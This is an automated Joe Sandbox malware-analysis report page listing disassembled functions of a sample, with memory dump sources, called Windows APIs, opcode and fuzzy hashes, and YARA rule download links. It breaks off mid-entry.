                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID:
                                                                                    • API String ID: 1061551593-0
                                                                                    • Opcode ID: 18bfb2044f3e70d431553845538fb483cecd93c39f8bb4fe106a30785ef4665e
                                                                                    • Instruction ID: 6f127faf511828bfe80d1888631c635f8622a19dc39a94d9ead7537d525b685d
                                                                                    • Opcode Fuzzy Hash: 18bfb2044f3e70d431553845538fb483cecd93c39f8bb4fe106a30785ef4665e
                                                                                    • Instruction Fuzzy Hash: 0D816D36B18A058AEB10AF6AD8406ADB771FB99B99F804132CF0D57B28CF3CD146C754
                                                                                    Function 00007FF7B8F19AC4 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                    • String ID:
                                                                                    • API String ID: 2169056816-0
                                                                                    • Opcode ID: 0d11588afb3970c1f86920922f5e5509676ee08965de2f49768c26c0a7eb402a
                                                                                    • Instruction ID: 13344dd53a7836b55ab2822a66188060c315243c5ada44d520114b29827ee7a6
                                                                                    • Opcode Fuzzy Hash: 0d11588afb3970c1f86920922f5e5509676ee08965de2f49768c26c0a7eb402a
                                                                                    • Instruction Fuzzy Hash: 22115E32618B8199E6219F55E4007E5F360FF99785FC84135DB4C03658DF3CD646C758
                                                                                    Function 00007FF7B8F00688 Relevance: 1.7, APIs: 1, Instructions: 234COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF7B8F01890: CreateFileW.KERNELBASE ref: 00007FF7B8F0196E
                                                                                      • Part of subcall function 00007FF7B8F01890: GetLastError.KERNEL32 ref: 00007FF7B8F01981
                                                                                      • Part of subcall function 00007FF7B8F01890: CreateFileW.KERNEL32 ref: 00007FF7B8F019E3
                                                                                      • Part of subcall function 00007FF7B8F01890: GetLastError.KERNEL32 ref: 00007FF7B8F019EC
                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8F009D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorFileLast$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1381046063-0
                                                                                    • Opcode ID: c1cc5d735d8a9f6cbdb61147f5fbdc16513819190927cdba642be9dffcfac1d8
                                                                                    • Instruction ID: 7bf83b3f2f3ae67c7ebb78906a7e656356f8de23ab00fb664b586638f0bcb407
                                                                                    • Opcode Fuzzy Hash: c1cc5d735d8a9f6cbdb61147f5fbdc16513819190927cdba642be9dffcfac1d8
                                                                                    • Instruction Fuzzy Hash: 8791C032B1864289EB10EF6AD4502B9E361FBA6BC5F804032EF5D4779ADE3CD546C714
                                                                                    Function 00007FF7B8F04224 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    • API String ID: 1889659487-0
                                                                                    • Opcode ID: c411fd5ded362d50915c368b3c5811918dab1970b9969c2428285441b409caa2
                                                                                    • Instruction ID: ef25309c16ae1402fca37af2bb1e15de062f9b48748f347fe71856f1b156b2ec
                                                                                    • Opcode Fuzzy Hash: c411fd5ded362d50915c368b3c5811918dab1970b9969c2428285441b409caa2
                                                                                    • Instruction Fuzzy Hash: 75012531E0D5828DFA717B58E4153F5E7506BBB34AFC40135D79C06699CE2CA1468A3C
                                                                                    Function 00007FF7B8F281A0 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: 0
                                                                                    • API String ID: 3215553584-4108050209
                                                                                    • Opcode ID: 32db98a37a2e3cc136df4119b9878ac22f2881e00cb5ea76627d04c6addcc100
                                                                                    • Instruction ID: fc7dafaf1d4257cb4a1cc5815d26db8ebd58570d731dca4c552a6d424a193f3c
                                                                                    • Opcode Fuzzy Hash: 32db98a37a2e3cc136df4119b9878ac22f2881e00cb5ea76627d04c6addcc100
                                                                                    • Instruction Fuzzy Hash: 0981C431A39A024EEAA4AE1D804067DE390EF67746FD41531FF09876DDCE2DE8578638
                                                                                    Function 00007FF7B8F27F24 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: 0
                                                                                    • API String ID: 3215553584-4108050209
                                                                                    • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                    • Instruction ID: bb9c16100a79a3adfd81b8ac1f07d593dd48024d65112bbf58d9ca5f6ea0a4b0
                                                                                    • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                    • Instruction Fuzzy Hash: 7871B331A2C2824EFB64EE1D404027DE790DB63755F940535EF488B6DECE2DE8478769
                                                                                    Function 00007FF7B8F0C540 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: gj
                                                                                    • API String ID: 0-4203073231
                                                                                    • Opcode ID: fc9dedba33d72a715cc27bb9a943d55b89b93ffd827425084a6ce7fa97b9fb32
                                                                                    • Instruction ID: b0d2c562c8d564e0b06ebb1689544a0cb8aff87e766ffe7a068d40d690620a93
                                                                                    • Opcode Fuzzy Hash: fc9dedba33d72a715cc27bb9a943d55b89b93ffd827425084a6ce7fa97b9fb32
                                                                                    • Instruction Fuzzy Hash: 8F51A537B286948BD718CF29E41199EB3A5F398788F445129EF4A83B49CB3DD941CF40
                                                                                    Function 00007FF7B8F2B758 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 7cf99e146c1641336d19fb7e311d46897a180d0031200e443df83375beb78f9f
                                                                                    • Instruction ID: 3b28aafd646c6b6ad43496d63fe3e462f46351fa504fd010e37f5666637776d1
                                                                                    • Opcode Fuzzy Hash: 7cf99e146c1641336d19fb7e311d46897a180d0031200e443df83375beb78f9f
                                                                                    • Instruction Fuzzy Hash: E9419172714A458AEB04EF2AD4241A9E3A1BB59FC4F9D9036EF0D87799DE3CD446C304
                                                                                    Function 00007FF7B8F2FC40 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 820732c4663d1a1f89e8b30917ba5da5edfb3a61d737e51b2e4aaca6b582d31a
                                                                                    • Instruction ID: 6f1a9dcad999ccc4f5fe3f49f89794fbb215664919db302f8aad5be884f8f3e7
                                                                                    • Opcode Fuzzy Hash: 820732c4663d1a1f89e8b30917ba5da5edfb3a61d737e51b2e4aaca6b582d31a
                                                                                    • Instruction Fuzzy Hash: 9CB04820E16A028AEA482B19A882694A2A4AB69B12FD80039C20C40324DE2C21A65724
                                                                                    Function 00007FF7B8F1319C Relevance: .9, Instructions: 935COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 012b2bdf26780dd33329a607de65fe5bd7b7b30844d5888e2e9f7c854c3a6c63
                                                                                    • Instruction ID: c78512d2460d99071418a8af99f2a413209db565ec4a4ae7ce9eb87f8042ab9b
                                                                                    • Opcode Fuzzy Hash: 012b2bdf26780dd33329a607de65fe5bd7b7b30844d5888e2e9f7c854c3a6c63
                                                                                    • Instruction Fuzzy Hash: 7482E173A096C18AD704FF2CD4546BCFBA1E766B89F898136CB4A17789CE3C9446C324
                                                                                    Function 00007FF7B8F14C50 Relevance: .9, Instructions: 894COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b81ad90bc00ffa7305f4426a1aeb893548c14e9161fb9f56d6066a182c418c0
                                                                                    • Instruction ID: a396444528cef26b5d5b83ff6a6754171ce12eeace12b67c857a7cd5b425876a
                                                                                    • Opcode Fuzzy Hash: 1b81ad90bc00ffa7305f4426a1aeb893548c14e9161fb9f56d6066a182c418c0
                                                                                    • Instruction Fuzzy Hash: E1821473A092C18AD714EF28D4447BCFBA1F7A6B49F588136CB4A47789DA3CE446C724
                                                                                    Function 00007FF7B8EF7550 Relevance: .9, Instructions: 867COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b58e6ab87df6c28b5f54a5634b1c82765b43c8f801b906eb30613143f4409b29
                                                                                    • Instruction ID: c52da0ad57efe79e13e9372ad681ae4ffe0b812326851ff33a6a4117865f4b39
                                                                                    • Opcode Fuzzy Hash: b58e6ab87df6c28b5f54a5634b1c82765b43c8f801b906eb30613143f4409b29
                                                                                    • Instruction Fuzzy Hash: B662819AD7AF9A1EE313E53A54020E2F36D0EFB4C5596D31BFCA430D16AB61A6C30314
                                                                                    Function 00007FF7B8F0B4D4 Relevance: .7, Instructions: 748COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9b98fe4a8efe445cc86ba1dd7fe521c523f09f261c174a8aacf3a031856f4ae3
                                                                                    • Instruction ID: b5b1d6afea187435839415ce9fdc77cfdab379c5fb4b26e77b3e529bdf0a356b
                                                                                    • Opcode Fuzzy Hash: 9b98fe4a8efe445cc86ba1dd7fe521c523f09f261c174a8aacf3a031856f4ae3
                                                                                    • Instruction Fuzzy Hash: 3D5248B3B246548BD365CF19E889E5F77A9F788784B46D318DB0A8BB05D63CD901CB40
                                                                                    Function 00007FF7B8F1441C Relevance: .6, Instructions: 567COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 907186660deeaaed22d8738c2b505fe1078276317d5b8168ef4c387c308dde43
                                                                                    • Instruction ID: 6899e9c84c0cc826b32e07d97e87c90b9cf2b8ea626a07052f01ffa1f84dd5b2
                                                                                    • Opcode Fuzzy Hash: 907186660deeaaed22d8738c2b505fe1078276317d5b8168ef4c387c308dde43
                                                                                    • Instruction Fuzzy Hash: F932D472E041818BD718EF28D5507BCB7A1F7A5749F448239DB4A87B88DB3CE861C754
                                                                                    Function 00007FF7B8EF7018 Relevance: .4, Instructions: 390COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 86fe45f9a751129283f2acea0d21b177845440ea197c46f58f83ea7cdb3c87bc
                                                                                    • Instruction ID: a39637ff8d8d9c5449b19208f150dd2fe384ce8ef8e1a6efda73c58c7e8c15c4
                                                                                    • Opcode Fuzzy Hash: 86fe45f9a751129283f2acea0d21b177845440ea197c46f58f83ea7cdb3c87bc
                                                                                    • Instruction Fuzzy Hash: FFE16A73B141A18FE324CFBD9840A9D3BA1F39878CB45A125DF59A3F09D678D511CB84
                                                                                    Function 00007FF7B8F12560 Relevance: .3, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a5b02fa3201378ad8d9614ec6c04a71f1c51e9db5558cf6ef68ebc6d0063b00
                                                                                    • Instruction ID: dda4fb6b89904e05db8b64b5e0973a29bfca440cc69cdca22bfa1cedd8062903
                                                                                    • Opcode Fuzzy Hash: 3a5b02fa3201378ad8d9614ec6c04a71f1c51e9db5558cf6ef68ebc6d0063b00
                                                                                    • Instruction Fuzzy Hash: D7A12273A081834EEB15FA6C84447BDE691EBB2749F954135DB890778ADE3CE843C368
                                                                                    Function 00007FF7B8F0A868 Relevance: .2, Instructions: 244COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 06cce3a81cc82b0f875669fe1c5fc23d800eec9773703a11d6f6e4ff8eaaf546
                                                                                    • Instruction ID: 7b2194b238d178fc18538f0631f2145c451ff0fe5b1e7fc743159d2d1dc59514
                                                                                    • Opcode Fuzzy Hash: 06cce3a81cc82b0f875669fe1c5fc23d800eec9773703a11d6f6e4ff8eaaf546
                                                                                    • Instruction Fuzzy Hash: 2AC1E537A191F04DE302CBB9A4148FD3FB1E75E38DB864152EFA666B4EC9299101DB60
                                                                                    Function 00007FF7B8EF9E50 Relevance: .2, Instructions: 229COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: 592f45aa0811682718af093716bfb30daa8fac2d2ccf8e604bc858814a1fd6bf
